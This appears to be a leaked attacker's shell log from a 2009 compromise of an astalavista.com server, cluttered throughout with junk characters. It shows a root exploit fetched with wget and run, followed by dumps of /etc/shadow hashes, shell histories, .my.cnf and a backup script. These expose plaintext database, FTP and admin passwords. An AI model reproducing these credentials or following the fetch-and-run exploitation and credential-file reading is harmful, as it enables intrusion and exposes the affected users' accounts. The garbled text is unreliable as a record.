5 ~/ D5 `( i6 `# j% k1 qLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
4 s. J  l+ I/ p) s7 F; Ush-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]6 M* X% ^9 |- B
–13:33:37–  链接标记[url]http://anti.sec.labs/g0troot[/url]( ~  D( q3 i/ Y6 O
Resolving anti.sec.labs… 13.33.33.37* o7 E6 G, W3 r# W2 I3 @2 r
Connecting to anti.sec.labs|13.33.33.37|:80… connected.
8 G% Y/ g/ ]8 ~1 b2 eHTTP request sent, awaiting response… 200 OK4 o/ }7 I% W9 [3 g
Length: 18200 (18K) [text/plain]! j9 r: i! Y2 {/ T3 M. E1 }( t
Saving to: `g0troot’* I, y2 I7 h3 O. Y# _  K

: U0 S) C4 ~# Y2 z100%[=========================================================================================================================================>] 18,200      58.6K/s   in
, \1 I! ]: [  d0.3s: {& q, |6 ~# d  z0 P" m

% @+ M9 w! {/ k# q" T3 l18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
2 f3 x$ U/ v1 k1 x1 O7 o
; ?0 S4 C) t9 [) A- p, [3 W2 jsh-3.2$ ./g0troot -i x86_64& e* o7 B/ }" P! a  e; m2 O0 ]
[+] g0troot - anti.sec.labs
' x7 |' K% l; m# |[+] Target: 2.6.18-128.1.10.el50 A3 Q7 a1 d# `5 C, q# D
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]1 p& P% q& b  J1 f
* s( E9 }% k! Q
[+] r00tr00t& f1 Z6 D' ]$ i* n+ h7 ~/ J
[~] Executing shell…
3 Q: I; \& B# n) g+ w. P2 Y
" V1 F& z$ @  p" \) T* G! \# }sh-3.2# id6 _9 e8 V2 }/ G: {( V; R6 N, o3 H
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)8 o. M8 C8 F  U. T8 T$ p
& C+ |5 @& z" V# [# ~0 r! S* U
sh-3.2# cat /etc/shadow
' I3 Q" B  C, M- l: U) \root1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::8 C8 h, r8 e5 e# P' x- \& K7 q
[snip]! V( B" c" o/ ^; {! R. s
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
/ m7 }( G& A0 ~+ `9 n* Y- l* |jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::9 Q% g- P. s6 N& [$ @% R9 K
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::: _  T5 k, A# p6 N
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::4 n+ T7 B9 m4 G- Q4 C

: D: w2 k4 |( M1 d9 Q+ `3 r% hsh-3.2# cat /etc/motd" S. m/ ~, N7 _
#####################################################
3 h4 K" t; s: @3 x7 R#____ ____ ___ ____ _    ____ _  _ _ ____ ___ ____  #
; L4 j5 ~  z( h, U: ?# |__| [__   |  |__| |    |__| |  | | [__   |  |__| #
; ^8 u: f3 a' M1 G2 t6 a# |  | ___]  |  |  | |___ |  |  \/  | ___]  |  |  | #
8 R6 `/ O, K8 k7 \#                                                   #/ g$ B+ B5 v" I6 q: A- q4 w
#####################################################. D  O) p4 D& G7 D
#                                                   #
) w; a6 K7 A6 t# Admin Contact - 链接标记support@secureservertech.com      #
- j: u2 v! M8 q, n) M& I5 C' M#                                                   #
3 p" t( a0 F$ U+ g! H# Available ShortCuts                               #& D  _- w' i: h* S* J
#                                                   #
' A4 X9 B' l6 H3 Y3 B6 V# nst -  list active connections                    #. Z' W: T* F2 U# L$ j$ d6 X# x& e8 \4 N
# ddos - shows how many times each ip is connected  #/ }* J+ W1 u- O5 O* a, _
# ltr -  restart the webserver                      #+ d! u( h6 ]( Y1 v
# phpc - edit the php config file                   #! c2 _( `" U) r7 n4 Q' W3 K' l9 S$ r- p
# htc -  edit the webserver configuration file      #2 ]$ H! q3 x7 e- V7 X% G
# up -   uptime                                     #& \' f" E$ z& f5 }' h
# etd - edit the motd of the day file               #2 f+ H; M0 r( C( B* V+ M
# htr - start and restart apache if needed          #
" R3 H; z, w7 z" f, i# syng - shows active SYN_RECV connections          #
" _) o. r0 l- P5 W/ ?/ K# synd - syn flood blocker - “synd -h” for usage    #
) e8 h  c' r8 @, ~#####################################################+ p5 C5 f/ Y5 h
# NOTES:                                            #
' O& }& ?6 }3 E" M* y( T# Last Upgrade - 12-08-2008 by JF                   #
, H# C; e6 ~3 g& K; o1 P* g2 r# My.cnf/Mysql Optimization - 1-28-09               #) m1 J: i3 \/ [
#                                                   #& h% }) B' A* Y; r$ S, M
#                                                   #
. W) O. C$ l) @#                                                   #
# f2 s6 _4 e4 u, `' t: H6 e1 d#####################################################
0 A# i+ c3 I  O1 x$ B4 V. i
+ H1 N/ Z" C6 @6 S* Rsh-3.2# lastlog | grep -v Never
, T% {2 Q8 S' |7 f) @Username         Port     From             Latest$ a3 k0 n3 \/ W! W
root             pts/1    adsl-194-162-fix Thu Jun  4 07:19:14 +0000 2009
( \; \1 p5 [0 s5 M* I6 k: \/ j& C8 jadmin            pts/1    cp.secureservert Thu Mar 20 10:25:39 +0000 2008
8 z' C" q: C' U( T5 }com              pts/0    cust.static.212- Tue Jun  2 07:46:30 +0000 2009) ~* ]$ G0 P8 r' X+ ~5 N, y
astanet          pts/0    adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
: I0 [+ e6 G& b1 C" u! K9 m" G$ h, P% n
sh-3.2# ls -la
+ D  y! f  p: ^4 E$ ^% H2 i( ltotal 4533768 {! S! x" t" V1 |% @/ N  _/ n
drwxr-x— 15 root root       4096 Jun  4 08:40 .) O% \0 @0 N- _0 k: Z8 \. p6 k. \
drwxr-xr-x 25 root root       4096 Jun  3 02:43 ..
% F2 k# ^3 h: v& ]-rw-r–r–  1 root root    2394400 Oct 19  2007 10mbtest.zip
: O& b0 u! M  s-rw——-  1 root root       1006 Sep 11  2007 anaconda-ks.cfg1 c6 V1 a6 z# @8 s; B# w
-rw——-  1 root root      16836 Jun  4 07:21 .bash_history
  P& a0 P( N! f9 S& T2 ], h-rw-r–r–  1 root root         24 Jan  6  2007 .bash_logout
( ^% p* ~# Q  a& l" G$ |0 V3 f/ I-rw-r–r–  1 root root        191 Jan  6  2007 .bash_profile
  B4 ^2 u' Z8 X; H  u: H8 p- h-rw-r–r–  1 root root        176 Jan  6  2007 .bashrc
1 C7 f, m: f% z7 {" m-rwx——  1 root root       1899 Oct 28  2007 bk.sh
% L2 r8 T8 J' g4 F9 y* [-rw-r–r–  1 root root       1327 Nov 29  2007 cert/ m6 P9 e3 L6 F( @: V5 Z8 F
-rw-r–r–  1 root root  139860821 May 14  2008 contrexxbackup_20080514.sql; C6 C; O) U: r& Y
drwxr-xr-x  4 root root       4096 May 20  2008 .cpan5 N: B  o; N, M; W) i# g9 R, ~
-rw-r–r–  1 root root        100 Jan  6  2007 .cshrc
+ |, C6 \0 t/ f$ N; d-rw-r–r–  1 root root     323079 Mar 31 13:48 defaultp_ports.sql
0 T3 e$ F! q4 ], N6 d  o$ |$ bdrwx——  2 root root       4096 Oct 28  2007 .elinks; N; ^' ^4 \/ A6 ~6 `
drwxr-xr-x 13 root root       4096 Mar 21  2008 gdb-6.7.15 Z5 P; z8 B" F, R" |: |
-rw-r–r–  1 root root   15080950 Oct 29  2007 gdb-6.7.1.tar.bz2
/ Z+ C2 x* ~+ o- u9 L-rw——-  1 root root          0 Apr 16 13:19 .history
4 P; U) j4 e1 e8 I7 y% R% ~-rw-r–r–  1 root root      16095 Sep 11  2007 install.log
. v+ o& Z6 `6 }6 {; T; c-rw-r–r–  1 root root       2566 Sep 11  2007 install.log.syslog! p) A3 v* o4 z$ V2 ?$ o
-rw-r–r–  1 root root       1003 Jul 22  2007 install.sh
6 e6 H% y) F, R-rw——-  1 root root         35 Jun  2 14:23 .lesshst
  q9 N' N% h: D4 V, Q: H0 rdrwxr-xr-x  2 root root       4096 Dec 29  2007 .lftp: \, ]8 H- C2 A2 p1 Z8 u9 q
drwxr-xr-x 10 root root       4096 Sep 14  2007 linux-2.6.19.2-grsec! Z- z: g( y" O
-rw-r–r–  1 root root   94979336 Feb 16  2007 linux-2.6.19.2-grsec.tar.gz
% {( S+ }# ^7 h/ R- a-rw-r–r–  1 root root    4737058 Sep 22  2007 linux-2.6.22.tar.bz2) k0 V# n1 a7 Y) y, ?
-rwx——  1 root root        760 Sep 18  2008 lp1 ~- u- E0 [, U: E
drwxr-xr-x 12 root root       4096 Nov 30  2007 lsws-3.3.1- Y, C! \' ^) K0 m! ^8 ]
-rw-r–r–  1 root root    2480045 Nov 30  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz7 W2 ]$ d" P1 V- Z' T
-rw-r–r–  1 root root    6388501 Nov 29  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.11 d9 A, Y' T8 T2 ?
drwxr-xr-x 12 root root       4096 Mar 21  2008 lsws-3.3.98 N. y- s7 o) G7 i
-rw-r–r–  1 root root    6437577 Mar 21  2008 lsws-3.3.9-ent-x86_64-linux.tar.gz3 p/ M" z7 ~8 u) V5 [5 c) J5 o9 S, e
drwxr-xr-x 12 root root       4096 May 29 15:10 lsws-4.0.3$ B2 ]3 @9 N9 c" Y+ `
-rw-r–r–  1 root root    6496050 May  8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz2 r; I! T: t/ I) ^
-rw-r–r–  1 root root      25316 Feb 15  2006 mybk.sh1 ?! v0 W! l  E+ `& B( T
-rw——-  1 root root         41 Oct 19  2007 .my.cnf1 h. i3 ~, W2 G% H/ A2 J. E
-rw——-  1 root root       2902 Jun  4 08:40 .mysql_history% E6 ~2 e* w; A5 E% @( s2 O7 \0 _
-rwx——  1 root root      38873 Apr 16  2008 mysqlreport1 W! S% i* P) P
-rw——-  1 root root         41 May 20  2008 .mytop0 \+ V8 B9 W+ K8 _) u2 R% q
drwxr-xr-x  3 1000  1000      4096 May 20  2008 mytop-1.6
$ B0 R( K7 {  R$ c8 b/ Q  O( o-rw-r–r–  1 root root      19720 Feb 17  2007 mytop-1.6.tar.gz
5 Q$ G/ P: H, p" }0 s: Adrwxr-xr-x  2 root root       4096 Oct 28  2007 .ncftp, j5 E# D5 ]( d7 G; s' G7 Q5 e
-rw——-  1 root root       1462 Sep 21  2007 opt.php# f3 T. H+ h, \) F6 f- }( j+ T$ c
-rw-r–r–  1 root root       3371 Sep 22  2007 p; E: a1 B) L! |- R
-rw-r–r–  1 root root    7608429 Aug 30  2007 php-5.2.4.tar.bz2/ V1 y1 O- R! s# t) a0 Z2 x! R7 U
-rw——-  1 root root       1024 Feb  3 21:32 .rnd
6 t1 J% f' Q7 M4 f: Q-rw-r–r–  1 root root        716 Nov 28  2007 server.csr9 S$ f) A3 i9 w
-rw-r–r–  1 root root        887 Nov 28  2007 server.key3 `9 G5 V! @# A, I
drwx——  2 root root       4096 Oct 10  2008 .ssh9 Q6 Z3 f8 M8 P2 K6 U) D# j  P3 {
-rw-r–r–  1 root root      44227 Oct 28  2007 tar-inc-backup.dat
6 h! u: r% y. I1 E, A& l-rw-r–r–  1 root root        129 Jan  6  2007 .tcshrc4 `; ]$ r4 y& G0 h
-rw-r–r–  1 root root  104874307 Oct 17  2007 test100.zip
$ f+ r2 }2 b2 n5 v8 G, M-rw-r–r–  1 root root   67085540 Oct 19  2007 test100.zip.1+ i3 W/ Z. `/ Q3 |2 p- F' ~1 h, {
drwxr-xr-x  2 root root       4096 Apr 29 11:15 tmp
! Z6 m% ?5 E! Q  d: H" Y-rw-r–r–  1 root root      42596 May 21  2007 tuning-primer.sh
. E" x, N! s' Adrwxrwxrwx 19 1000 users      4096 Mar 21  2008 valgrind-3.3.0* S4 Z+ l' `" r
-rw-r–r–  1 root root    4519551 Dec 11  2007 valgrind-3.3.0.tar.bz2
5 x+ F2 G9 B' s! l$ y5 u4 E2 `-rw——-  1 root root      12997 May 16  2008 .viminfo
( z! F$ C( @# m/ n* m' F- Q# n8 Y! H  j% U2 S# R4 t
sh-3.2# cat .bash_history
1 T# w9 ^) N" h7 F[snip]
3 X2 r, Y5 w/ b' V# A0 A# O' \wget cp4sst.com/sstlinux.tar.gz
' ^2 Y6 B. r. @, w+ jtar zxvf sstlinux.tar.gz
2 ^; e0 s) f4 H0 o4 Acd linux-2.6.27.10  E6 b5 a4 \+ w. K3 Y3 Z5 y& q
sh install.sh
  w( U) x+ |% h2 ^6 u; ]* }make bzImage ; make modules ; make modules_install ; make install' q" o5 z& r; l  N" j! Y6 h
make clean
& B1 L) Y0 N/ s+ y' z6 j8 M5 tservice mysqld restart
3 J+ |$ G9 a) _[snip]* H7 y$ N- c  P( W/ N+ t
cd /usr/sbin/& B" @( U4 c# `. ~$ l/ ]
chmod 4777 traceroute
5 @7 ~% H: u/ ]0 f' c* w6 t5 `chmod 4777 ping5 i8 k  A' R* {+ v* f" |- t; f
traceroute -I 链接标记[url]www.astalavista.ch[/url]" u/ @* k" A: [9 V) F
[snip]
6 w1 D/ G' E* q3 i1 Kvi /etc/csf/csf.conf* i( D1 y" w  b- R* M) Y) j
traceroute google.ch
# h8 g! ]  O: Mservice csf restart
6 ]9 q/ c& r' E% [% i& ktracert google.ch2 s$ r1 B1 ~& Z
service csf restart
9 M% m/ r( Y/ N# ktraceroute 链接标记[url]www.google.ch[/url]3 T) U+ m8 Z! F
tracert 链接标记[url]www.google.ch[/url]
7 T& N8 ]: y* o% x$ j$ K' K; ztraceroute 链接标记[url]www.google.ch[/url]
! V. P# C* b+ t( E1 i6 O4 Ylocate traceroute0 L! T+ O) a/ ]
chown 4755 /bin/traceroute& O: |6 N  p$ ~- X* U
chown 4777 /bin/traceroute
9 Q# {7 U0 F/ M6 e1 jlocate ping
/ D2 T* {9 v7 k: Z4 l0 |% s2 ychown 4755 /bin/ping
6 d8 @# c# v! N8 D' uchown 4777 /bin/ping2 r( y0 i" D& t; A
cd /bin/
* t8 B; N7 t2 [1 i% ~ls -ali | grep ping6 U/ v2 \1 ]# I% a
chown root ping- t0 H, M; ^: F5 `
chmod 4755 ping% D2 K! O; c. U- l9 p6 C) F: K
ls -ali | grep traceroute# E, t3 c: @8 `: x1 K
chown root traceroute
* g" ~8 E5 o) M: F& u& l! Wchmod 4755 traceroute
* o) v% Z- T, h7 `6 F3 Z! tls -ali | grep traceroute4 S, {+ H3 i8 ?, \. P: J
traceroute -I 链接标记[url]www.google.ch[/url]# c/ w0 u- Q/ l8 j
traceroute 链接标记[url]www.google.ch[/url]
* q/ @0 n  d  c2 Swhois pmsantos.ch
6 J5 N0 ?; z0 V* F! I/ U9 H) V[snip]& y: P2 M1 U0 o9 |& y" G
mysql -h com_contrexx2_live < /root/defaultp_ports.sql- L2 O+ a' i2 S
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
  r. O3 F9 m! R! |/ h, lmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
, T' v$ K' q9 F2 L4 \) r5 _% f4 kmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql7 C, P; u1 d" F- f1 T
top
6 P% g. P4 Q$ s3 k# J( Eping ssth.ch" v% `" R9 B3 A  P: z
ping asdlkfaljgasd???ljg???lasj.ch) |& A7 f% k( f( l3 B. Z
ping asdlkfaljgasdlasj.ch
0 d# z( Z# r7 Uping 链接标记[url]www.ssth.ch[/url]
2 M# i' q7 W, q2 t8 [) S+ v  Xping ssth.ch: O  {/ C% b8 I7 m
nslookup 链接标记[url]www.google.ch[/url]. w! q7 g" F3 D  ]6 a+ c/ y
nslookup 链接标记[url]www.ssth.ch[/url]2 V. R4 D& _7 y8 k# \+ N+ s
man nslookup5 F5 W- s9 ~7 h" v' g) U& P( j5 E
ping 链接标记[url]www.google.ch[/url]
4 ~' @: R9 i2 }+ N. dnslookup 链接标记[url]www.google.ch[/url]
5 A. w. [% E7 x/ \6 L3 k3 gnslookup 链接标记[url]www.google.ch[/url]2 l% `8 r3 L2 C( D2 G
nslookup salfjasdlf.ch
3 M6 U  v4 Z( ^9 r+ p' j! P[snip]) X5 N- B6 `: D5 {) q
openssl passwd -1 sadf0 Y" M6 K, A; t2 y8 R2 r+ k
openssl passwd -1 5cZNHstdTy
/ [1 p% h* A3 Q) [( zmysql- X8 l0 G2 U% H8 a4 K
mysql
0 b: Z4 o2 n6 W1 ?locate proftp
6 G+ [7 S% V( [& O+ @2 }& Kvi /etc/proftpd.passwd- ?- v0 J' D# Z8 L9 V! S% B* i
service proftpd restart
8 M' o/ K% `6 a: T+ Nlocate proftpd.conf
8 I+ [+ K, j$ U4 ]6 o( V+ G1 Nvi /etc/proftpd.conf% U0 L" ~6 E6 D2 f( q( N
vi /etc/proftpd.passwd
. x; A( J5 L$ ]1 g# iservice proftpd restart# p4 ~6 u: h) g! j
[snip]
- v- E' y; D. V3 |/bin/sh /home/com/backup_system/backup.sh! H- n  `( ~: D* F7 G- N0 M
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
0 _/ e0 `" W4 m1 c. z# Tmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql# j# @, e2 U0 C3 Q
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql$ i* F/ k+ r5 b, P% g
ls -ali
/ \; b* x0 ]1 cmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
$ X2 B+ J( ^$ W" O. ~/ m, d  b9 \mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
0 J: }) c4 |8 {7 D) v. E' o) Xcrontab -l' U0 X2 f& N% S1 {' C/ N6 T6 [0 s' M
crontab -l4 @1 `* U1 ]4 s1 c2 B7 E
php -q /home/com/public_html/modifications/cronjobs/securitynews.php
+ H/ J! ~4 J$ N6 n! d& v/home/com/public_html/modifications/cronjobs/exploits.sh
2 }; X9 Z: l) R- u& C- Pwget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
" |# d. z' v# p3 J! [9 V4 A9 A" ytar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz4 J  K1 E/ |8 M. H! [
cd lsws-4.0.3
( O/ j! k+ T& r( U! B# W% Q0 ssh install.sh
) U  C/ f2 h$ H. ]5 }( Yuptime; x4 c2 o; L" |; L' h, B" ?
hdparm -tt /dev/sda0 l9 O% P" R+ V3 H8 D. |
iostat" ^4 b! w( J5 L1 g' Q2 ?; _
yum install iostat# a" H+ j0 p  R9 r% |# b* u/ |4 K
iostat: D3 M+ p' J4 b' h6 Y; i  c
whereis iostat
3 z2 V/ t5 h5 \8 i+ l7 }7 uyjm clean all
: i# Q/ `8 x+ R  h. }: f* Dyum clean all ; yum -y update
4 E+ L' j6 [# G3 V+ [iostat8 @2 w. l: Z) ]3 m9 }
yum install systat
4 K" c. V3 J" w2 G( J( h4 s0 Erpm -qa | grep iostat
8 U7 I! D& r( K5 ]( |. i  S6 trpm -qa | grep sysstat# J. q5 B4 \% y/ s3 {
rpm -qa | grep systat
/ g2 S. B7 ?% Gdmesg -c
( {6 k* E8 k6 _5 Rsysctl -p
! G& t1 O* u2 l7 k5 Luname -r
8 `+ S3 P% ?( U% Q2 h/ V# H0 rcd /usr/src& T" J1 S- }+ g5 Y8 d- p* n& i3 l
wget nix101.com/kernels/sstlinux.tar.gz
: ~5 ?. R" ?& s( [* U2 Oshutdown -r now
3 q5 _4 i& Q* @+ Xnano -w /boot/grub/grub.conf0 N9 x4 S8 w0 S8 b4 [

7 R+ \# I: u) X0 p3 e8 Nsh-3.2# cat .my.cnf
% F1 e. U0 k& @$ I% I0 |$ Z[client]
2 t: S& A) O; B0 ~; \& K) suser=da_admin
5 z; ]/ B4 c; kpassword=X9dctmRH& Q0 w. `- N) L$ @/ _, U

" S: b* {- |9 Csh-3.2# cat /home/com/backup_system/backup.sh8 H$ i, B6 e  Z$ T! v
#!/bin/sh
- Z8 ]- p# ~. x#####################################################################
- P3 s* L# ?: R+ i, S" ]1 e- Y6 K#                                                                   #
2 h% d/ W; w1 }/ ~4 a, j#   incremental backup for astalavista.com                          #! Q7 V2 v4 S3 W9 s8 G$ j/ ]6 M
#                                                                   #5 ~- M0 Z+ y" w( x
#   author:    Paulo M. Santos <链接标记paulo.santos@astalavista.com>       #
  l) m) |3 R# _+ _; @9 c#                                                                   #
; x7 V3 Q, E- D5 i+ D, A; b& I#####################################################################
9 T% U  C2 Z; Q8 Q( M- F[snip]% f7 x, I; g! p9 S
PROG_DIR=”/home/com/backup_system”;- O# q% P3 D' F
BACKUP_DIR=”/home/com/backups”;0 R% c- ]6 X3 j- M
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;. ~0 Q, Q( X6 D! {8 t0 |6 r
# ftp for synology backup server0 X" N/ C" |6 v) g
FTP_HOST=”212.254.194.163″;8 Z, G/ r# R8 c
FTP_PORT=”21″;4 t" u8 \! B* E1 a) o4 y2 b+ Q) [
FTP_USER=”astalavista.com”;: H3 z. p' N) u& |! r4 d" H8 p5 q
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;  L( D0 K: W9 K  I3 `
FTP_DIR=”/astalavista.com”;6 e2 f) \! g) R. b7 w( I
# database
, g6 w- G  B% D- O) m/ ?1 a' WDB_HOST=”localhost”;% `3 j6 p4 P$ P& r. s* v1 f/ Q
DB_USER=”contrexxuser2″;0 l4 M" ]) K8 Q2 w1 a
DB_PASS=”0fEYNZgXz1pKe”;
: M# @1 b' i5 ^+ kDB_DATABASE1=”com_contrexx2_live”;1 f4 s" k" h- U/ v- H* e
DB_DATABASE2=”com_contrexx2″;7 d  X" }, Z5 s  _3 {0 b& X% m( }9 v
[snip]
" W2 l; Y4 \) J$ O& X  F- b4 B% Uftp -in $FTP_HOST $FTP_PORT <<EOF
' n. n6 y& [( V; f$ |* Dquote USER $FTP_USER
8 z; f. N; Q5 Q+ s, Y$ d" m  Vquote PASS $FTP_PASS
" n4 K; }3 n2 ^0 a9 i4 H4 Ocd $FTP_DIR3 ]6 e/ U" m* O6 y* d; E
put $DB_FULLNAME-SQL_Dump.tar
, c5 q& B, R2 X( d8 Q  S& n- l) P! N% i4 p' zput $BACKUP_FULLNAME-Public_HTML.tar
1 n- @+ y" T* E% E) R' Vclose
: @7 f" S# r0 t1 G2 }: r& P1 d) N4 z* ybye& E: A: h  I" p, o' j0 \/ H9 c5 U
EOF: M# f$ S- [0 K) j4 y- C) W% T1 h$ T

0 a6 p* ^! i% K2 _/ s! Bsh-3.2# cd /home( J( o& X) `% i% V2 s2 Q0 r9 O
sh-3.2# ls -la: a7 F. I% E* k5 L8 ]0 k9 Q2 T
total 120
/ A4 h8 a4 E! `7 U+ s8 y% fdrwxr-xr-x 14 root    root     4096 Mar 11 17:56 .
9 F' Q8 V& l/ G! Y* `drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..
8 l7 S7 n3 ^2 ?4 Mdrwx–x–x  9 admin   admin    4096 Nov 28  2007 admin
) F2 N6 y0 {4 j) P3 Q-rw——-  1 root    root     8192 Jun  4 03:03 aquota.group
  e5 |' S2 e' Z" g+ [3 ?" D-rw——-  1 root    root     8192 Jun  3 02:45 aquota.user5 u  f7 Y  f' P5 @
drwx–x–x  6 astanet astanet  4096 Jun  4 09:51 astanet
+ n) W: x' V& [9 u* A: @: [$ ldrwxr-xr-x  2 root    root     4096 Jul 29  2008 backup
" h1 B$ n3 @! J! Tdrwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161
; t% T5 E9 G6 D! u; [% m& O. ldrwx–x–x 10 com     com      4096 Apr 28 12:40 com  K3 t) V" J, R) h2 i/ M
drwxr-xr-x  2 root    root     4096 May 17  2007 ftp
1 W5 L3 Q0 V9 _drwx——  3 jon     jon      4096 Sep 21  2007 jon
9 T9 S6 x! v' Q, Y9 q" mdrwx——  2 root    root    16384 Sep 11  2007 lost+found7 W+ S$ K. m# z  g
drwxr-xr-x  2 root    root     4096 Sep 14  2007 my& N' C# b' t) h7 q8 c; ~
drwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata9 Z: ]( |, \/ B. X. u5 _/ J. Q. m1 y' Q
drwx——  2 jon     jon      4096 Sep 15  2007 test
+ x  Z7 H  j$ H! ^  v+ ]3 i" {drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp
( i) q% \0 m+ L& G  Q$ x8 D; g- @. a1 c" o, C6 m. P
sh-3.2# cd admin7 z- y+ e  _4 Q
sh-3.2# ls -la3 T/ L( D+ K& S7 x- @  F& [, i
total 1735896/ C+ T9 m$ q! A: \
drwx–x–x  9 admin admin       4096 Nov 28  2007 .
4 L% \- H+ q& j4 Cdrwxr-xr-x 14 root  root        4096 Mar 11 17:56 ..& e! j( ^8 t: V- E$ H
drwxrwxr-x  2 admin admin       4096 Oct 25  2007 admin_backups! q' @$ J* H3 \0 u+ S
drwx——  2 admin admin       4096 Sep 28  2007 backups' m- D$ R7 z6 v7 f5 v" h
-rw——-  1 admin admin        860 Sep 17  2008 .bash_history' V: q! e) S. O5 d
-rw-r–r–  1 admin admin         24 Sep 14  2007 .bash_logout$ C9 P! U! h+ A( J
-rw-r–r–  1 admin admin        176 Sep 14  2007 .bash_profile- ]1 ]  |& H2 C: e- I; {2 H
-rw-r–r–  1 admin admin        124 Sep 14  2007 .bashrc
: ^) B2 A5 c( f! [drwxr-xr-x  2 root  root        4096 Sep 28  2007 com_backups! ^( G. Z& T4 o) y
drwx–x–x  6 admin admin       4096 Sep 21  2007 domains
0 D- Z( P5 v$ idrwxrwx—  3 admin mail        4096 Sep 21  2007 imap" J+ G+ N! G) S# g
-rw-r–r–  1 root  root          24 Sep 21  2007 info.php- o9 M0 P' G7 c+ {) k! H
drwx——  2 admin admin       4096 Sep 21  2007 mail
5 L, s7 J0 r! `; U/ Z* Y* y-rw-r–r–  1 root  root         716 Nov 28  2007 server.csr) Z. |2 o" B1 T9 Q9 i$ F3 m
-rw-r–r–  1 root  root         887 Nov 28  2007 server.key2 W, i* s4 b4 g$ A5 Q+ H# b' R* ]( P
-rw-r—–  1 admin mail          34 Sep 14  2007 .shadow
- j! I8 B3 V+ u3 r-rw-r—–  1 admin com   1775711054 Oct 25  2007 user.admin.com.tar.gz
! {$ H$ z* L. L% X/ `drwx–x–x  2 admin admin       4096 Jul 29  2008 user_backups% w( |' @5 N& O) d" |
9 S* g! G) }" }6 X5 ^- X
sh-3.2# ..* q) P# [* T/ l+ B; i
sh-3.2# cd jon" g: a6 ~3 B7 Z' J" L  i+ e/ o
sh-3.2# ls -la
: e9 Q: ?* E9 @3 c  a: k  Ftotal 362 f  U+ K/ ?; E4 Y& J1 ~$ E  A2 U- |4 f
drwx——  3 jon  jon  4096 Sep 21  2007 .7 w, @% r$ u0 y  I0 E2 o5 p6 k
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..2 J' H/ v  z" E4 D
-rw——-  1 jon  jon    53 Sep 21  2007 .bash_history3 ]2 @( y7 R$ |+ x  H5 O  _
-rw-r–r–  1 jon  jon    24 Sep 21  2007 .bash_logout5 x2 y, Z) N6 Q7 p0 D
-rw-r–r–  1 jon  jon   176 Sep 21  2007 .bash_profile8 o) B2 R$ p* o  E+ _
-rw-r–r–  1 jon  jon   124 Sep 21  2007 .bashrc( V( \1 r" e8 X0 O
-rw-r–r–  1 root root   24 Sep 21  2007 info.php* E" l* k1 |2 [9 R1 Q( `
drwxrwxr-x  2 jon  jon  4096 Sep 21  2007 public_html
* R" ]3 _4 A+ d8 J3 r& Y3 w+ D
1 E& S; ~; W' c; hsh-3.2# cd ..2 l9 g! y# O, @' U" X% X* t4 c
sh-3.2# cd test
! o4 T6 X# R; A# x7 X5 lsh-3.2# ls -la, c; z0 y) z+ B" F9 f( E# V( l1 U
total 48
  g. J/ E2 H# H1 s+ ldrwx——  2 jon  jon  4096 Sep 15  2007 .
2 |5 D8 _# V* Z! n; Xdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..* n# z% O0 h+ D: @+ ]! `  A7 S
-rw——-  1 jon  jon    79 Sep 21  2007 .bash_history
. }9 p# ~0 ^0 R-rw-r–r–  1 jon  jon    24 Sep 15  2007 .bash_logout
1 e8 U" V; c: R* h) Y7 T1 ?-rw-r–r–  1 jon  jon   176 Sep 15  2007 .bash_profile2 Q$ b8 f) P8 t
-rw-r–r–  1 jon  jon   124 Sep 15  2007 .bashrc" E9 H. e! q0 P0 J) Q9 c; ]
sh-3.2# cat .bash_history- N! E1 S  H7 l
/usr/bin/mysqladmin -u root password PoliuJhytg67
0 D, Y) P# _% A% c0 p
) U' [0 h; a* s& Y" q$ nsh-3.2# cd ..
0 j% W8 q7 v6 S6 C4 vsh-3.2# cd astanet  z& F. g) F6 ~1 W' z: {
sh-3.2# ls -la
! }& X1 L1 r% ?: G$ t+ C9 N4 Z) vtotal 52; ~' G/ P6 B( ^0 e$ B
drwx–x–x  6 astanet astanet 4096 Jun  4 09:51 .9 t" k6 [4 Q; W8 \$ A
drwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..; ^1 B1 r" v0 A9 H
drwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth2 U8 X9 X4 T/ [. C  Z9 c: L
-rw——-  1 astanet astanet 3892 Apr 16 12:14 .bash_history
